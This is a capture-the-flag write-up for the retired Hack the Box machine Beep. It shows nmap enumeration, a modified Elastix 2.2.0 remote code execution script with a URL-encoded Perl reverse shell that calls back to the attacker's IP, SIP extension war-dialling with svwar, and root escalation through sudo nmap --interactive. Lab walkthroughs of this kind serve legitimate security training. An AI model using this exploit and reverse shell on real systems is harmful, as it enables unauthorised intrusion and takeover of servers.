My writeup of how to compromise the retired Hack the Box machine, Beep.
Note: You can find my previous guide to Shocker here.
As always we start with our initial enumeration.
$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.7
Lots of ports open on this box including ssh, http and https, smtp, and pop.
Browsing to port 80 redirects us straight to 443 and shows us a login page for Elastix which is a VOIP PBS system.
A quick search on Exploit DB shows that there is a remote code execution vulnerability for Elastix 2.2.0, so lets give that a whirl.
We download the script from exploit-db and take a closer look at it. We need to edit it slightly to put in the targets IP and our own IP along with which port we are going to be listening on. Start up netcat and then run the script ...
Uh oh. We get an SSL error. We need to modify the python code a little to make it ignore certificate errors. We can change the script over to the following:
import urllib import ssl rhost="10.10.10.7" lhost="10.10.14.15" lport=443 extension="1000" ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE # Reverse shell payload url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' urllib.urlopen(url, context=ctx)
OK, now the script runs without any errors but we don't get a shell back. The likelihood is that the phone extension the script is looking for doesn't exist.
So we need to use another tool to locate a valid SIP extension, SIP Vicious. We utilise the War Dialling tool,
$ svwar -m INVITE -e100-300 10.10.10.7
So now we can modify our script again and change the extension over to 233. Running it now gives us our shell, and access to the first flag.
Reading the comments on the bottom of the exploit also tells us an incredibly easy way to get root. Simply enter the following into your shell.
> sudo nmap --interactive > !sh
And done; a root shell and access to the final flag.
There are at least 3 other ways of getting shells on this box. I leave it to you as an exercise to find them.